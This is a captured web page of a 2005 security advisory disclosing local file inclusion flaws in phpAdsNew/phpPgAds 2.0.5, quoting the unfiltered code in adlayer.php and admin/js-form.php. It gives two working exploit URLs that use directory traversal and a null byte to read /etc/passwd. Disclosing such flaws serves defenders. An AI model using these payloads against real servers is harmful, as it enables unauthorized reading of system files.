|
 |
| SecurityReason | ||
| WLB | ||
| RSS | ||
| Corporate | ||
| Services | ||
| Note | ||
If you have found a vulnerability, please send to our SecurityAlert Database : |
||
| Details : SecurityReason Advisory | |||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||
 Advisory Text : -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 [phpAdsNew/phpPgAds 2.0.5 Local file inclusion cXIb8O3.16] Author: Maksymilian Arciemowicz (cXIb8O3) from SECURITYREASON.COM TEAM Date: 14.07.2005 (01:54 GMT+01.00) - --- 0.Description --- phpAdsNew is an open-source ad server, with an integrated banner management interface and tracking system for gathering statistics. With phpAdsNew you can easily rotate paid banners and your own in-house advertisements. You can even integrate banners from third party advertising companies. - --- 1. Local file inclusion --- In phpAdsNew and phpPgAds 2.0.5 exists two bugs. First bug exist in adlayer.php. Code: - -151-153--- phpAds_registerGlobal ('what', 'clientid', 'clientID', 'context', 'target', 'source', 'withtext', 'withText', 'layerstyle'); - -151-153--- and - -178-182--- if (!isset($layerstyle) || empty($layerstyle)) $layerstyle = 'geocities'; // Include layerstyle require(phpAds_path.'/libraries/layerstyles/'.$layerstyle.'/layerstyle.inc. php'); - -178-182--- Varible $layerstyle isn't filtered and you can try to include local file. For example error: http://[HOST]/[DIR]/adlayer.php?layerstyle=securityreason.com and you can see error like this: - --- <br /> <b>Warning</b>: main(): Unable to access ./libraries/layerstyles/securityreason.com/layerstyle.inc.php in <b>/www/phpadsnew-2.0.5/adlayer.php</b> on line <b>181</b><br /> <br /> <b>Warning</b>: main(./libraries/layerstyles/securityreason.com/layerstyle.inc.php): failed to open stream: No such file or directory in <b>/www/phpadsnew-2.0.5/phpadsnew-2.0.5/adlayer.php</b> on line <b>181</b><br /> <br /> <b>Fatal error</b>: main(): Failed opening required './libraries/layerstyles/securityreason.com/layerstyle.inc.php' (include_path='.:') in <b>/www/phpadsnew-2.0.5/adlayer.php</b> on line <b>181</b><br /> - --- Exploit: http://[HOST]/[DIR]/adlayer.php?layerstyle=../../../../../../../etc/passwd% 00 Magic_quotes must be OFF . Next problem exist in ./admin/js-form.php Code: - -26-28--- @include (phpAds_path.'/language/english/default.lang.php'); if ($HTTP_GET_VARS['language'] != 'english' && file_exists(phpAds_path.'/language/'.$HTTP_GET_VARS['language'].'/default.l ang.php')) @include (phpAds_path.'/language/'.$HTTP_GET_VARS['language'].'/default.lang.php'); - -26-28--- And if magic_quotes_gpc = Off, you can do attack. Exploit: http://[HOST]/[DIR]/admin/js-form.php?language=../../../../../../../../../. ./etc/passwd%00 but here you don't see any error because first is function file_exists. - --- 3. How to fix --- Download the new version of the script. - --- 4. Greets --- sp3x - --- 5.Contact --- Author: Maksymilian Arciemowicz < cXIb8O3 > Email: max [at] jestsuper [dot] pl or cxib [at] securityreason [dot] com GPG-KEY: http://securityreason.com WWW: http://securityreason.com -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.4.0 (FreeBSD) iD8DBQFC23pYznmvyJCR4zQRAnKUAJ9oc6khDtnehufyXWMZQK1i5AFnJgCgmUjC hROFCdP7k+/pi1dS9SJjCOw= =yRLH -----END PGP SIGNATURE----- |
|
||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||
|
|||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||
(
- 2008-11-27